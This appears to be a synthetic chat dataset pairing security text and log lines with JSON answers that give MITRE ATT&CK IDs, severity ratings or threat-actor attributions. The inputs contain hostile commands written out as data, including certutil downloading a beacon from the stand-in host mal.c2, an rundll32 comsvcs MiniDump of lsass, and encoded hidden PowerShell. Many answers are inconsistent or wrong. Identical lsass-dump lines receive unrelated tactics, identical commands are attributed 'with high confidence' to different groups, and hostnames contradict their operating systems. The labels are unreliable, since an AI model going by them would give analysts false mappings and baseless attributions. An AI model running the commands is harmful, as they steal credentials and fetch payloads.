messages listlengths 2 2 |
|---|
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CSPY Downloader can download additional tools to a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-7785N3MEVM)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-GZIQS0FL17)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Credential Access",
"role": "user"
},
{
"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3786 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.170.65.38",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1546.003... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.182.34.203",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2214 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-2Z437U0BU9)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Collection, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2781 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-FGVB3RQ9RK)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact, Command and Control, Discovery",
"role": "user"
},
{
"cont... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: poison name services",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557.001\", \"T1557\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-SUM70NWIII)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Impact, Command and Control",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2993 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.9.41.122",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1071.001\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Babuk can enumerate disk volumes, get disk information, and query service status.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.102.244.22",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0002\"], \"techniques\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.",
"role": "user"
},
{
"con... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.58.42.183",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0010\", \"TA0004\"], \"t... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2840 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.125.175.66",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0003\"], \"techniques\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT32 has collected the OS version and computer name from victims.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-U9WZ7TFLSY)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Defense Evasion",
"role": "user"
},
{
"conte... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2591 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.66.191.218",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1021.00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2313 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Comnie encrypts command and control communications with RC4.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Inception has used malicious HTA files to drop and execute malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218.005\", \"T1218\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-ZFN1TMV1QD)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Credential Access",
"role": "user"
},
{
"cont... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet",
"role": "user"
},
{
"content":... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.27.252.237",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0003\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-SEG4NY9YG1)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Reconnaissance",
"role": "user"
},
{
"cont... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-5VVY7VH90O)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery, Execution",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-4NOIKVQBBZ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-H2J38AHL2K)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Initial Access, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: P.A.S. Webshell can scan networks for open ports and listening services.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: looks for net and account or domain in close proximity",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.109.214.17",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA000... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MBR + overwrite/wipe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-WV1ED0TVK4)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Credential Access",
"role": "user"
},
{
"conte... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Tomiris has used SCHTASKS /CREATE /SC DAILY /TN StartDVL /TR \"[path to self]\" /ST 10:00 to establish persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3267 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2897 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.",
"role": "user"
},
{
"content": "{\"tactics\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Astaroth has used malicious files including VBS, LNK, and HTML for execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}",
"role": "assis... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.96.20.31",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0011\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3676 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-NT2BTP8KMH)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Critical\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-IG95CAGBFJ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Initial Access, Collection",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1110 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-ZGFUK7Y4OE)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution, Discovery, Defense Evasion",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Higaisa used a FakeTLS session for C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1001\", \"T1001.003\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-GU9P3MM4VJ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T10... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2965 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.97.83.177",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0002\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-RVDBGBAD5U)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Hi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-JAMCRMMTV2)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution, Exfiltration",
"role": "user"
},
{
"conte... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Naikon has convinced victims to open malicious attachments to execute malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1938 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.85.103.240",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0001\", \"TA0002\"], \"t... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.125.46.156",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.002\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"High... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-2358PSBK02)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Hig... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-PA7A7DYJ24)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Exfiltration",
"role": "user"
},
{
"content":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3480 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Honeybee removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"technique... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: There exist user and global Registry keys for the Office Test feature:",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137.002\", \"T1137\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.119.32.117",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Hi-Zor uses various XOR techniques to obfuscate its components.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Restrict software installation to user groups that require it.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.005\", \"T1021\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.",
"role": "user"
},
{
"cont... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-PVJDNFBQIF)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Execution, Discovery",
"role": "user"
},
{
"cont... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.175.203.251",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.126.18.47",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Commands such as net group /domain can be used in Net to gather information about and manipulate groups.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069.002\", \"T10... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.161.88.246",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"t... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: njRAT will attempt to detect if the victim system has a camera during the initial infection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1120\"]}",
"role": "assis... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 799 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.97.141.164",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-CK4CPKM7FC)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-J7E8RTPOQT)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Execution, Lateral Movement",
"role": "user"
},
{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1284 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1417 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.61.32.120",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1021.... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-CZ9ZEJIVPQ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"Extrem... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-LBI4MERXX3)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Lateral Movement, Credential Access",
"role": "user"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2076 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.125.55.38",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0008\"], ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098.001\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-P7D7B0SSQ1)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Critical... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.46.142.211",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\",... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.